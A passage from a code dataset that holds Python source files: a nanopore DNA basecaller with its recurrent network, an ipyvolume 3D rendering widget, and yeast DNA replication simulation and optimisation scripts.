args.batch_size,
callbacks = [checkpointer, reduce_lr])
if __name__ == '__main__':
main()
```
|
{
"source": "jeammimi/deepnano",
"score": 2
}
|
#### File: deepnano/r9/basecall.py
```python
from rnnf import Rnn
import h5py
import argparse
import os
import datetime
import numpy as np
from extract_events import extract_events
def scale(X):
m25 = np.percentile(X[:,0], 25)
m75 = np.percentile(X[:,0], 75)
s50 = np.median(X[:,2])
me25 = 0.07499809
me75 = 0.26622871
se50 = 0.6103758
ret = np.array(X)
scale = (me75 - me25) / (m75 - m25)
m25 *= scale
shift = me25 - m25
ret[:,0] = X[:,0] * scale + shift
ret[:,1] = ret[:,0]**2
sscale = se50 / s50
ret[:,2] = X[:,2] * sscale
return ret
def get_events(h5):
if not args.event_detect:
try:
e = h5["Analyses/Basecall_RNN_1D_000/BaseCalled_template/Events"]
return e
except:
pass
try:
e = h5["Analyses/Basecall_1D_000/BaseCalled_template/Events"]
return e
except:
pass
return extract_events(h5, args.chemistry)
def basecall(filename, output_file):
try:
h5 = h5py.File(filename, "r")
events = get_events(h5)
if events is None:
print "No events in file %s" % filename
h5.close()
return 0
if len(events) < 300:
print "Read %s too short, not basecalling" % filename
h5.close()
return 0
events = events[50:-50]
mean = events["mean"]
std = events["stdv"]
length = events["length"]
X = scale(np.array(np.vstack([mean, mean*mean, std, length]).T, dtype=np.float32))
o1, o2 = ntwk.predict(X)
o1m = (np.argmax(o1, 1))
o2m = (np.argmax(o2, 1))
om = np.vstack((o1m,o2m)).reshape((-1,),order='F')
output = "".join(map(lambda x: alph[x], om)).replace("N", "")
print >>output_file, ">%s_template_deepnano" % filename
print >>output_file, output
output_file.flush()
h5.close()
return len(events)
except Exception as e:
print "Read %s failed with %s" % (filename, e)
return 0
alph = "ACGTN"
parser = argparse.ArgumentParser()
parser.add_argument('--chemistry', choices=['r9', 'r9.4'], default='r9.4')
parser.add_argument('--output', type=str, default="output.fasta")
parser.add_argument('--directory', type=str, default='', help="Directory where read files are stored")
parser.add_argument('--watch', type=str, default='', help='Watched directory')
parser.add_argument('reads', type=str, nargs='*')
parser.add_argument('--debug', dest='debug', action='store_true')
parser.add_argument('--no-debug', dest='debug', action='store_false')
parser.add_argument('--event-detect', dest='event_detect', action='store_true')
parser.set_defaults(debug=False)
parser.set_defaults(event_detect=False)
args = parser.parse_args()
assert len(args.reads) != 0 or len(args.directory) != 0 or len(args.watch) != 0, "Nothing to basecall"
ntwks = {"r9": os.path.join("networks", "r9.pkl"), "r9.4": os.path.join("networks", "r94.pkl")}
ntwk = Rnn()
ntwk.load(ntwks[args.chemistry])
if len(args.reads) or len(args.directory) != 0:
fo = open(args.output, "w")
files = args.reads
if len(args.directory):
files += [os.path.join(args.directory, x) for x in os.listdir(args.directory)]
total_events = 0
start_time = datetime.datetime.now()
for i, read in enumerate(files):
current_events = basecall(read, fo)
if args.debug:
total_events += current_events
time_diff = (datetime.datetime.now() - start_time).seconds + 0.000001
print "Basecalled %d events in %f (%f ev/s)" % (total_events, time_diff, total_events / time_diff)
fo.close()
if len(args.watch) != 0:
try:
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
except:
print "Please install watchdog to watch directories"
sys.exit()
class Fast5Handler(PatternMatchingEventHandler):
"""Class for handling creation fo fast5-files"""
patterns = ["*.fast5"]
def on_created(self, event):
print "Calling", event
file_name = str(os.path.basename(event.src_path))
fasta_file_name = os.path.splitext(event.src_path)[0] + '.fasta'
with open(fasta_file_name, "w") as fo:
basecall(event.src_path, fo)
print('Watch dir: ' + args.watch)
observer = Observer()
print('Starting Observerer')
# start watching directory for fast5-files
observer.start()
observer.schedule(Fast5Handler(), path=args.watch)
try:
while True:
time.sleep(1)
# quit script using ctrl+c
except KeyboardInterrupt:
observer.stop()
observer.join()
```
#### File: deepnano/r9/rnnf.py
```python
import numpy as np
import pickle
def sigmoid(x):
return 1 / (1 + np.exp(-x))
class OutLayer:
def __init__(self):
self.n_params = 2
self.params = [None, None]
def calc(self, input):
otmp = np.dot(input, self.params[0]) + self.params[1]
e_x = np.exp(otmp - otmp.max(axis=1, keepdims=True))
return e_x / e_x.sum(axis=1, keepdims=True)
class SimpleLayer:
def __init__(self):
self.n_params = 10
self.params = [None for i in range(10)]
def calc(self, input):
state = self.params[9]
# output = []
output = np.zeros((len(input), self.params[2].shape[0]), dtype=np.float32)
for i in range(len(input)):
update_gate = sigmoid(np.dot(state, self.params[6]) +
np.dot(input[i], self.params[4]) +
self.params[8])
reset_gate = sigmoid(np.dot(state, self.params[5]) +
np.dot(input[i], self.params[3]) +
self.params[7])
new_val = np.tanh(np.dot(input[i], self.params[0]) +
reset_gate * np.dot(state, self.params[1]) +
self.params[2])
state = update_gate * state + (1 - update_gate) * new_val
output[i] = state
return np.array(output)
class BiSimpleLayer:
def __init__(self):
self.fwd = SimpleLayer()
self.bwd = SimpleLayer()
def calc(self, input):
return np.concatenate([self.fwd.calc(input), self.bwd.calc(input[::-1])[::-1]],
axis=1)
class Rnn:
def __init__(self):
pass
def predict(self, input):
l1 = self.layer1.calc(input)
l2 = self.layer2.calc(l1)
l3 = self.layer3.calc(l2)
return self.output1.calc(l3), self.output2.calc(l3)
def debug(self, input):
l1 = self.layer1.calc(input)
l2 = self.layer2.calc(l1)
l3 = self.layer3.calc(l2)
return l1, l2, l3
def load(self, fn):
with open(fn, "rb") as f:
self.layer1 = BiSimpleLayer()
for i in range(10):
self.layer1.fwd.params[i] = pickle.load(f)
for i in range(10):
self.layer1.bwd.params[i] = pickle.load(f)
self.layer2 = BiSimpleLayer()
for i in range(10):
self.layer2.fwd.params[i] = pickle.load(f)
for i in range(10):
self.layer2.bwd.params[i] = pickle.load(f)
self.layer3 = BiSimpleLayer()
for i in range(10):
self.layer3.fwd.params[i] = pickle.load(f)
for i in range(10):
self.layer3.bwd.params[i] = pickle.load(f)
self.output1 = OutLayer()
self.output2 = OutLayer()
for i in range(2):
self.output1.params[i] = pickle.load(f)
for i in range(2):
self.output2.params[i] = pickle.load(f)
```
#### File: deepnano/training/prepare_dataset.py
```python
import argparse
import os
import h5py
from helpers import *
parser = argparse.ArgumentParser()
parser.add_argument('type', choices=['temp', 'comp', '2d'])
parser.add_argument('source_file', type=str)
parser.add_argument('root', type=str)
parser.add_argument('output_directory', type=str)
args = parser.parse_args()
finput = open(args.source_file)
for i, l in enumerate(finput):
parts = l.strip().split()
filename = ' '.join(parts[:-2])
ref = parts[-2]
sub = parts[-1]
h5 = h5py.File(args.root+"/"+filename, "r")
print h5["Raw"].keys()
def t_to_b(model_state):
return model_state
if sub == "1":
def t_to_b(model_state):
return model_state.replace("T","B")
fo = open(os.path.join(args.output_directory, "%s.txt" % i), "w")
print >>fo, t_to_b(ref)
base_loc = get_base_loc(h5)
if args.type == 'temp':
#scale, scale_sd, shift, drift = extract_scaling(h5, "template", base_loc)
events = h5[base_loc+"/BaseCalled_%s/Events" % "template"]
index = 0.0
data = []
events = events[50:-50]
mean = events["mean"]
std = events["stdv"]
length = events["length"]
X = scale(np.array(np.vstack([mean, mean*mean, std, length]).T, dtype=np.float32))
for e,(mean,meansqr,std,length) in zip(events,X):
print >>fo, " ".join(map(str, [mean,meansqr,std,length])),
move = e["move"]
if move == 0:
print >>fo, "NN"
if move == 1:
print >>fo, "N%s" % t_to_b(e["model_state"][2])
if move == 2:
print >>fo, "%s%s" % (t_to_b(e["model_state"][1]), t_to_b(e["model_state"][2]))
if args.type == 'comp':
scale, scale_sd, shift, drift = extract_scaling(h5, "complement", base_loc)
events = h5[base_loc+"/BaseCalled_%s/Events" % "complement"]
index = 0.0
data = []
for e in events:
mean = (e["mean"] - shift) / scale
stdv = e["stdv"] / scale_sd
length = e["length"]
print >>fo, " ".join(map(str, preproc_event(mean, stdv, length))),
move = e["move"]
if move == 0:
print >>fo, "NN"
if move == 1:
print >>fo, "N%s" % t_to_b(e["model_state"][2])
if move == 2:
print >>fo, "%s%s" % (t_to_b(e["model_state"][1]), t_to_b(e["model_state"][2]))
if args.type == '2d':
tscale, tscale_sd, tshift, tdrift = extract_scaling(h5, "template", base_loc)
cscale, cscale_sd, cshift, cdrift = extract_scaling(h5, "complement", base_loc)
al = h5["Analyses/Basecall_2D_000/BaseCalled_2D/Alignment"]
temp_events = h5[base_loc+"/BaseCalled_template/Events"]
comp_events = h5[base_loc+"/BaseCalled_complement/Events"]
prev = None
for a in al:
ev = []
if a[0] == -1:
ev += [0, 0, 0, 0, 0]
else:
e = temp_events[a[0]]
mean = (e["mean"] - tshift) / cscale
stdv = e["stdv"] / tscale_sd
length = e["length"]
ev += [1] + preproc_event(mean, stdv, length)
if a[1] == -1:
ev += [0, 0, 0, 0, 0]
else:
e = comp_events[a[1]]
mean = (e["mean"] - cshift) / cscale
stdv = e["stdv"] / cscale_sd
length = e["length"]
ev += [1] + preproc_event(mean, stdv, length)
print >>fo, " ".join(map(str, ev)),
if prev == a[2]:
print >>fo, "NN"
elif not prev or a[2][:-1] == prev[1:]:
print >>fo, "N%c" % a[2][2]
else:
print >>fo, "%c%c" % (a[2][1], a[2][2])
fo.close()
h5.close()
```
|
{
"source": "jeammimi/ipyvolume",
"score": 2
}
|
#### File: ipyvolume/ipyvolume/volume.py
```python
import ipywidgets as widgets
import ipywidgets
from traitlets import Unicode
import traitlets
from traittypes import Array
import logging
import numpy as np
from .serialize import array_cube_png_serialization, array_serialization
from .transferfunction import *
import warnings
logger = logging.getLogger("ipyvolume")
_last_volume_renderer = None
@widgets.register('ipyvolume.Scatter')
class Scatter(widgets.DOMWidget):
_view_name = Unicode('ScatterView').tag(sync=True)
_view_module = Unicode('ipyvolume').tag(sync=True)
_model_name = Unicode('ScatterModel').tag(sync=True)
_model_module = Unicode('ipyvolume').tag(sync=True)
x = Array(default_value=None).tag(sync=True, **array_serialization)
y = Array(default_value=None).tag(sync=True, **array_serialization)
z = Array(default_value=None).tag(sync=True, **array_serialization)
vx = Array(default_value=None,allow_none=True).tag(sync=True, **array_serialization)
vy = Array(default_value=None,allow_none=True).tag(sync=True, **array_serialization)
vz = Array(default_value=None,allow_none=True).tag(sync=True, **array_serialization)
selected = Array(default_value=None,allow_none=True).tag(sync=True, **array_serialization)
size = traitlets.Float(0.01).tag(sync=True)
size_selected = traitlets.Float(0.02).tag(sync=True)
color = traitlets.Unicode(default_value="red").tag(sync=True)
color_selected = traitlets.Unicode(default_value="white").tag(sync=True)
geo = traitlets.Unicode('diamond').tag(sync=True)
default_style = dict()
default_style["figure.facecolor"] = "black"
default_style["xaxis.color"] = "red"
default_style["yaxis.color"] = "green"
default_style["zaxis.color"] = "blue"
default_style["axes.color"] = "grey"
@widgets.register('ipyvolume.VolumeRendererThree')
class VolumeRendererThree(widgets.DOMWidget):
"""Widget class representing a volume (rendering) using three.js"""
_view_name = Unicode('VolumeRendererThreeView').tag(sync=True)
_view_module = Unicode('ipyvolume').tag(sync=True)
_model_name = Unicode('VolumeRendererThreeModel').tag(sync=True)
_model_module = Unicode('ipyvolume').tag(sync=True)
data = Array(default_value=None, allow_none=True).tag(sync=True, **array_cube_png_serialization)
data_min = traitlets.CFloat().tag(sync=True)
data_max = traitlets.CFloat().tag(sync=True)
tf = traitlets.Instance(TransferFunction, allow_none=True).tag(sync=True, **ipywidgets.widget_serialization)
angle1 = traitlets.Float(0.1).tag(sync=True)
angle2 = traitlets.Float(0.2).tag(sync=True)
scatters = traitlets.List(traitlets.Instance(Scatter), [], allow_none=False).tag(sync=True, **ipywidgets.widget_serialization)
animation = traitlets.Float(1000.0).tag(sync=True)
ambient_coefficient = traitlets.Float(0.5).tag(sync=True)
diffuse_coefficient = traitlets.Float(0.8).tag(sync=True)
specular_coefficient = traitlets.Float(0.5).tag(sync=True)
specular_exponent = traitlets.Float(5).tag(sync=True)
stereo = traitlets.Bool(False).tag(sync=True)
fullscreen = traitlets.Bool(False).tag(sync=True)
width = traitlets.CInt(500).tag(sync=True)
height = traitlets.CInt(400).tag(sync=True)
downscale = traitlets.CInt(1).tag(sync=True)
show = traitlets.Unicode("Volume").tag(sync=True) # for debugging
xlim = traitlets.List(traitlets.CFloat, default_value=[0, 1], minlen=2, maxlen=2).tag(sync=True)
ylim = traitlets.List(traitlets.CFloat, default_value=[0, 1], minlen=2, maxlen=2).tag(sync=True)
zlim = traitlets.List(traitlets.CFloat, default_value=[0, 1], minlen=2, maxlen=2).tag(sync=True)
xlabel = traitlets.Unicode("x").tag(sync=True)
ylabel = traitlets.Unicode("y").tag(sync=True)
zlabel = traitlets.Unicode("z").tag(sync=True)
style = traitlets.Dict(default_value=default_style).tag(sync=True)
#xlim = traitlets.Tuple(traitlets.CFloat(0), traitlets.CFloat(1)).tag(sync=True)
#y#lim = traitlets.Tuple(traitlets.CFloat(0), traitlets.CFloat(1)).tag(sync=True)
#zlim = traitlets.Tuple(traitlets.CFloat(0), traitlets.CFloat(1)).tag(sync=True)
def _volume_widets(v, lighting=False):
import ipywidgets
#angle1 = ipywidgets.FloatSlider(min=0, max=np.pi*2, value=v.angle1, description="angle1")
#angle2 = ipywidgets.FloatSlider(min=0, max=np.pi*2, value=v.angle2, description="angle2")
#ipywidgets.jslink((v, 'angle1'), (angle1, 'value'))
#ipywidgets.jslink((v, 'angle2'), (angle2, 'value'))
if lighting:
ambient_coefficient = ipywidgets.FloatSlider(min=0, max=1, step=0.001, value=v.ambient_coefficient, description="ambient")
diffuse_coefficient = ipywidgets.FloatSlider(min=0, max=1, step=0.001, value=v.diffuse_coefficient, description="diffuse")
specular_coefficient = ipywidgets.FloatSlider(min=0, max=1, step=0.001, value=v.specular_coefficient, description="specular")
specular_exponent = ipywidgets.FloatSlider(min=0, max=10, step=0.001, value=v.specular_exponent, description="specular exp")
#angle2 = ipywidgets.FloatSlider(min=0, max=np.pi*2, value=v.angle2, description="angle2")
ipywidgets.jslink((v, 'ambient_coefficient'), (ambient_coefficient, 'value'))
ipywidgets.jslink((v, 'diffuse_coefficient'), (diffuse_coefficient, 'value'))
ipywidgets.jslink((v, 'specular_coefficient'), (specular_coefficient, 'value'))
ipywidgets.jslink((v, 'specular_exponent'), (specular_exponent, 'value'))
widgets_bottom = [ipywidgets.HBox([ambient_coefficient, diffuse_coefficient]),
ipywidgets.HBox([specular_coefficient, specular_exponent])]
else:
widgets_bottom = []
v.ambient_coefficient = 1
v.diffuse_coefficient = 0
v.specular_coefficient = 0
if 1:
stereo = widgets.ToggleButton(value=v.stereo, description='stereo', icon='eye')
fullscreen = widgets.ToggleButton(value=v.stereo, description='fullscreen', icon='arrows-alt')
ipywidgets.jslink((v, 'stereo'), (stereo, 'value'))
ipywidgets.jslink((v, 'fullscreen'), (fullscreen, 'value'))
widgets_bottom += [ipywidgets.HBox([stereo,fullscreen])]
return ipywidgets.VBox(
[v.tf.control(), v,
] + widgets_bottom# , ipywidgets.HBox([angle1, angle2])
)
def volshow(*args, **kwargs):
"""Deprecated: please use ipyvolume.quickvol or use the ipyvolume.pylab interface"""
warnings.warn("Please use ipyvolume.quickvol or use the ipyvolume.pylab interface", DeprecationWarning, stacklevel=2)
return quickvolshow(*args, **kwargs)
def quickquiver(x, y, z, u, v, w, **kwargs):
import ipyvolume.pylab as p3
p3.figure()
p3.quiver(x, y, z, u, v, w, **kwargs)
return p3.current.container
def quickscatter(x, y, z, **kwargs):
import ipyvolume.pylab as p3
p3.figure()
p3.scatter(x, y, z, **kwargs)
return p3.current.container
def quickvolshow(data, lighting=False, data_min=None, data_max=None, tf=None, stereo=False,
width=400, height=500,
ambient_coefficient=0.5, diffuse_coefficient=0.8,
specular_coefficient=0.5, specular_exponent=5,
downscale=1,
level=[0.1, 0.5, 0.9], opacity=[0.01, 0.05, 0.1], level_width=0.1, **kwargs):
"""
Visualize a 3d array using volume rendering
:param data: 3d numpy array
:param lighting: boolean, to use lighting or not, if set to false, lighting parameters will be overriden
:param data_min: minimum value to consider for data, if None, computed using np.nanmin
:param data_max: maximum value to consider for data, if None, computed using np.nanmax
:param tf: transfer function (see ipyvolume.transfer_function, or use the argument below)
:param stereo: stereo view for virtual reality (cardboard and similar VR head mount)
:param width: width of rendering surface
:param height: height of rendering surface
:param ambient_coefficient: lighting parameter
:param diffuse_coefficient: lighting parameter
:param specular_coefficient: lighting parameter
:param specular_exponent: lighting parameter
:param downscale: downscale the rendering for better performance, for instance when set to 2, a 512x512 canvas will show a 256x256 rendering upscaled, but it will render twice as fast.
:param level: level(s) for the where the opacity in the volume peaks, maximum sequence of length 3
:param opacity: opacity(ies) for each level, scalar or sequence of max length 3
:param level_width: width of the (gaussian) bumps where the opacity peaks, scalar or sequence of max length 3
:param kwargs: extra argument passed to Volume and default transfer function
:return:
"""
if tf is None: # TODO: should this just call the pylab interface?
#tf = TransferFunctionJsBumps(**kwargs)
tf_kwargs = {}
# level, opacity and widths can be scalars
try:
level[0]
except:
level = [level]
try:
opacity[0]
except:
opacity = [opacity] * 3
try:
level_width[0]
except:
level_width = [level_width] * 3
#clip off lists
min_length = min(len(level), len(level_width), len(opacity))
level = list(level[:min_length])
opacity = list(opacity[:min_length])
level_width = list(level_width[:min_length])
# append with zeros
while len(level) < 3:
level.append(0)
while len(opacity) < 3:
opacity.append(0)
while len(level_width) < 3:
level_width.append(0)
for i in range(1,4):
tf_kwargs["level"+str(i)] = level[i-1]
tf_kwargs["opacity"+str(i)] = opacity[i-1]
tf_kwargs["width"+str(i)] = level_width[i-1]
tf = TransferFunctionWidgetJs3(**tf_kwargs)
if data_min is None:
data_min = np.nanmin(data)
if data_max is None:
data_max = np.nanmax(data)
v = VolumeRendererThree(data=data, data_min=data_min, data_max=data_max, stereo=stereo,
width=width, height=height,
ambient_coefficient=ambient_coefficient,
diffuse_coefficient=diffuse_coefficient,
specular_coefficient=specular_coefficient,
specular_exponent=specular_exponent,
tf=tf, **kwargs)
box = _volume_widets(v, lighting=lighting)
return box
def scatter(x, y, z, color=(1,0,0), s=0.01):
global _last_figure;
fig = _last_figure
if fig is None:
fig = volshow(None)
fig.scatter = Scatter(x=x, y=y, z=z, color=color, size=s)
fig.volume.scatter = fig.scatter
return fig
```
|
{
"source": "jeammimi/replication_yeast",
"score": 2
}
|
#### File: src/data/crossing_space.py
```python
from replication.simulate import create_initial_configuration
from replication.simulate import load_parameters, minimize
from hoomd import init, group, md, deprecated, dump, analyze
import hoomd
import numpy as np
import os
import sys
import json
if __name__ == "__main__":
param_file = sys.argv[1]
parameters = load_parameters(param_file)
# print(sys.argv)
if len(sys.argv) >= 3:
parameters["visu"] = True
if "sumatra_label" in parameters:
parameters.pop("sumatra_label")
if "sumatra_label" in parameters:
parameters["data_folder"] = os.path.join(parameters["data_folder"],
parameters["sumatra_label"])
else:
print("no extra label")
parameters["data_folder"] = os.path.join(parameters["data_folder"], "")
parameters["filename"] = param_file
print(parameters["data_folder"])
with open(os.path.join(parameters["data_folder"], "params.json"), "w") as f:
s = json.dumps(parameters)
f.write(s)
hoomd.context.initialize() # "--mode=cpu ")
# print(type(traj["p_origins"]) == list)
# if hoomd.comm.get_rank() == 0:
traj = parameters
snapshot, _, tag_spb, bond_list, plist, Cp, lP = create_initial_configuration(traj)
R = traj["R"]
data_folder = traj["data_folder"]
dcd_period = traj["dcd_period"]
control = traj["control"]
plist = ["A", "B"]
bond_list = ["A-A"]
snapshot.particles.types = plist
snapshot.bonds.types = bond_list
for p in range(len(snapshot.particles.typeid)):
snapshot.particles.typeid[p] = np.random.randint(2)
for p in range(len(snapshot.bonds.typeid)):
snapshot.bonds.typeid[p] = 0
system = init.read_snapshot(snapshot)
xml = deprecated.dump.xml(
filename=data_folder +
"atoms.hoomdxml",
period=None,
group=group.all(),
vis=True)
logger = analyze.log(
filename=data_folder +
'mylog.log',
period=1000,
quantities=[
'temperature',
'potential_energy',
'bond_harmonic_energy',
'external_wall_lj_energy',
"pair_table_energy",
'kinetic_energy',
'volume',
'pressure'],
overwrite=True)
# xml.disable()
# Force_field:
harmonic = md.bond.harmonic()
harmonic.bond_coeff.set(bond_list, k=20.0, r0=1)
def cos_soft(r, rmin, rmax, epsilon, sigma):
V = epsilon * (1 + np.cos(r * 3.1415 / (rmax)))
F = epsilon * 3.1415 / (rmax) * np.sin(r * 3.1415 / (rmax))
return (V, F)
nl = md.nlist.tree(r_buff=0.4, check_period=1)
# nl = md.nlist.stencil(r_buff=0.4, check_period=1)
# nl = md.nlist.cell(r_buff=0.4, check_period=1)
r_cut = 1.5
epsilon = 6.5
table = md.pair.table(width=1000, nlist=nl)
table.pair_coeff.set(plist, plist,
func=cos_soft, rmin=0, rmax=r_cut,
coeff=dict(epsilon=epsilon, sigma=1.0))
if not control:
table.pair_coeff.set("A", "B",
func=cos_soft, rmin=0, rmax=r_cut,
coeff=dict(epsilon=0, sigma=1.0))
sphere = md.wall.group()
sphere.add_sphere(r=R, origin=(0.0, 0.0, 0.0), inside=True)
# lj much more slower (at least in thu minimisation)
wall_force_slj = md.wall.lj(sphere, r_cut=1.12)
wall_force_slj.force_coeff.set(plist, epsilon=1.0, sigma=1.0,
r_cut=1.12, mode="shift")
# hoomd.comm.barrier()
microtubule_length = None
Spb_g = None
all_move = group.all()
minimize(traj, all_move, system, snapshot, Spb_g, Cp, microtubule_length)
sim_dt = traj["sim_dt"]
seed = traj["seed"]
md.integrate.mode_standard(dt=sim_dt)
method = md.integrate.langevin(group=all_move, kT=1, seed=seed)
snp = system # .take_snapshot()
md.integrate.mode_standard(dt=sim_dt / 4)
hoomd.run(100)
md.integrate.mode_standard(dt=sim_dt / 2)
hoomd.run(100)
dcd = dump.dcd(filename=data_folder + 'poly.dcd',
period=dcd_period, overwrite=True)
hoomd.run(1000000)
dcd.disable()
logger.disable()
```
#### File: src/data/make_3D_simulation.py
```python
import sys
sys.path.append("./")
from replication.simulate import simulate, load_parameters
import os
import json
import copy
import errno
import numpy as np
"""
def make_sure_path_exists(path):
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise"""
if __name__ == "__main__":
param_file = sys.argv[1]
parameters = load_parameters(param_file)
# print(sys.argv)
# if len(sys.argv) >= 3:
# parameters["visu"] = True
# if "sumatra_label" in parameters:
# parameters.pop("sumatra_label")
if "sumatra_label" in parameters:
parameters["data_folder"] = os.path.join(parameters["data_folder"],
parameters["sumatra_label"])
else:
print("no extra label")
parameters["data_folder"] = os.path.join(parameters["data_folder"], "")
parameters["filename"] = param_file
pd = parameters["data_folder"]
ir = pd.split("/").index("raw")
root = "/".join(pd.split("/")[:ir + 1])
print(root)
for d in pd.split("/")[ir + 1:]:
root += "/" + d
print(root)
if not os.path.exists(root):
os.mkdir(root)
os.makedirs(parameters["data_folder"], exist_ok=True)
with open(os.path.join(parameters["data_folder"], "params.json"), "w") as f:
s = json.dumps(parameters, indent=True)
f.write(s)
if parameters["p_origins"] == "xenope": # Xenopu
sub_sample_ori = parameters.pop("sub_sample_ori")
l_ori = [list(range(int(parameters["len_chrom"][0] * sub_sample_ori)))]
positions = [[]]
# Homogeneous
homogeneous = parameters.get("homogeneous", True)
if homogeneous:
interval = parameters["len_chrom"][0] / 1.0 / len((l_ori[0]))
for i in range(len((l_ori[0]))):
positions[-1].append(int(i * interval + interval * np.random.uniform()))
positions[0] = list(set(positions[0]))
else:
for i in range(len((l_ori[0]))):
positions[0].append(int(round(parameters["len_chrom"][0] * np.random.uniform(), 0)))
positions[0] = list(set(positions[0]))
# else:
# for i in range(len((l_ori[0]))):
# positions[-1].append(parameters["lengths"][0] * np.random.uniform())
positions[0].sort()
# print(positions)
# exit()
parameters["p_origins"] = positions
print(positions)
original = copy.deepcopy(parameters["visu"])
parameters["visu"] = True
simulate(parameters) # generate files for visualisation
parameters["visu"] = original
simulate(parameters)
```
#### File: src/data/make_optimize_1D.py
```python
import sys
sys.path.append("./")
from replication.ensembleSim import ensembleSim
from replication.simulate import load_parameters
from replication.tools import load_ori_position, load_lengths_and_centro
import os
import json
import _pickle as cPickle
from skopt import gp_minimize
from skopt import dump
import numpy as np
def latin(n, ranges, save=False):
"""
Build latin hypercube.
Parameters
----------
n : int
Number of points.
d : int
Size of space.
Returns
-------
pts : ndarray
Array of points uniformly placed in d-dimensional unit cube.
"""
# starting with diagonal shape
d = len(ranges)
pts = np.ones((n, d))
for i in range(n):
pts[i] = pts[i] * i / (n - 1.)
# spread function
def spread(p):
s = 0.
for i in range(n):
for j in range(n):
if i > j:
s = s + 1. / np.linalg.norm(np.subtract(p[i], p[j]))
return s
# minimizing spread function by shuffling
currminspread = spread(pts)
if save:
Save = [pts]
for m in range(1000):
p1 = np.random.randint(n)
p2 = np.random.randint(n)
k = np.random.randint(d)
newpts = np.copy(pts)
newpts[p1, k], newpts[p2, k] = newpts[p2, k], newpts[p1, k]
newspread = spread(newpts)
if newspread < currminspread:
pts = np.copy(newpts)
currminspread = newspread
if save:
Save.append(np.copy(newpts))
for ir, r in enumerate(ranges):
print(r)
pts[::, ir] = (r[1] - r[0]) * pts[::, ir] + r[0]
if save:
return pts, Save
return pts
if __name__ == "__main__":
param_file = sys.argv[1]
parameters = load_parameters(param_file)
# print(sys.argv)
if "sumatra_label" in parameters:
parameters["data_folder"] = os.path.join(parameters["data_folder"],
parameters["sumatra_label"])
parameters.pop("sumatra_label")
else:
print("no extra label")
parameters["data_folder"] = os.path.join(parameters["data_folder"], "")
parameters["filename"] = param_file
print(parameters["data_folder"])
with open(os.path.join(parameters["data_folder"], "params.json"), "w") as f:
s = json.dumps(parameters)
f.write(s)
# ensembleSim(Nsim, Nori, Ndiff, lengths, p_on, p_off, only_one,
# all_same_ori=False, l_ori=[], cut=10)
if type(parameters["lengths"]) == str:
lengths, _ = load_lengths_and_centro(parameters["lengths"], parameters["coarse"])
parameters["lengths"] = lengths
if type(parameters["Nori"]) == str and parameters["Nori"] != "xenope":
l_ori = load_ori_position(parameters["Nori"],
parameters["ori_type"],
parameters["lengths"],
parameters["coarse"])
if parameters["Nori"] == "xenope":
l_ori = [list(range(parameters["lengths"][0]))]
parameters.pop("filename")
data_folder = parameters.pop("data_folder")
parameters.pop("ori_type")
c = parameters.pop("coarse")
parameters["Nori"] = l_ori
def error(x, returnv=False, c=c):
if len(x) == 2:
only_one = True
else:
only_one = False
if only_one:
Ndiff = int(x[0])
p_on = x[1]
p_off = 0.2
else:
Ndiff = int(x[0])
p_on = x[1]
p_off = x[2]
# print(Ndiff,p_on)
# print(Ndiff,p_on)
E = ensembleSim(parameters["Nsim"], l_ori, Ndiff, parameters["lengths"],
p_on=p_on, p_off=p_off, only_one=only_one,
dt_speed=parameters["dt_speed"],
fork_speed=parameters["fork_speed"],
gindin=parameters["gindin"],
p_v=parameters["p_v"],
random=True,
all_same_ori=True)
E.run_all(40000, correlation=False)
if returnv:
return E
else:
if parameters["Nori"] == "xenope":
c = 1
else:
c = c / 1000
# print(c)
return getattr(E, parameters["optimisation"])(coarse=c)[0]
if parameters["only_one"]:
start = [parameters["rNdiff"], parameters["rp_on"]]
else:
start = [parameters["rNdiff"], parameters["rp_on"], parameters["rp_off"]]
x0 = latin(10, start).tolist()
print(x0)
res = gp_minimize(error, start, n_jobs=1, n_calls=parameters[
"n_calls"], n_random_starts=0, x0=x0)
with open(os.path.join(data_folder, "ensembleSim.pick"), "wb") as f:
cPickle.dump(error(res["x"], returnv=True), f)
dump(res, os.path.join(data_folder, "optimisation.pkl"))
```
#### File: src/data/make_preprocess.py
```python
import sys
sys.path.append("./")
import os
import errno
import glob
import _pickle as cPickle
import sys
sys.path.append("../../src/data")
from replication.tools import load_3D_simus
def make_sure_path_exists(path):
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
if __name__ == "__main__":
simu = sys.argv[1]
threeD = False
if len(sys.argv) == 3:
threeD = bool(sys.argv[2])
# print(sys.argv)
root = "data/raw"
two = True
if not threeD:
with open(root + "/" + simu + "/" + "ensembleSim.pick", "rb") as f:
tmp_simu = cPickle.load(f)
else:
ni = len(glob.glob(root + "/" + simu + "/traj*"))
tmp_simu, lengths, parameters1 = load_3D_simus(root + "/" + simu + "/traj", n=ni, orip=True)
tmp_simu.Nsim = len(tmp_simu.aIts)
tmp_simu.add_precomputed("Mean_replication_time", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("get_rep_profile", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("Pol", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("n3Dsim", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("passi_acti", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("passi", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("acti", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("Its", root + "/" + simu + "/" + "analysis.hdf5", two=two)
tmp_simu.add_precomputed("nIts", root + "/" + simu + "/" + "analysis.hdf5", two=two)
tmp_simu.add_precomputed("rho_ori", root + "/" + simu + "/" + "analysis.hdf5", two=two)
tmp_simu.add_precomputed("Free_Diff", root + "/" + simu + "/" + "analysis.hdf5", two=two)
tmp_simu.add_precomputed("Free_Diff_bis", root + "/" +
simu + "/" + "analysis.hdf5", two=two)
tmp_simu.add_precomputed("Fds", root + "/" + simu + "/" + "analysis.hdf5", two=two)
tmp_simu.add_precomputed("get_times_replication", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("get_dist_between_activated_origins",
root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("MeanIts", root + "/" + simu + "/" + "analysis.hdf5", two=two)
tmp_simu.add_precomputed("It_Mean_field_origins", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("It_Mean_field_simplified", root + "/" +
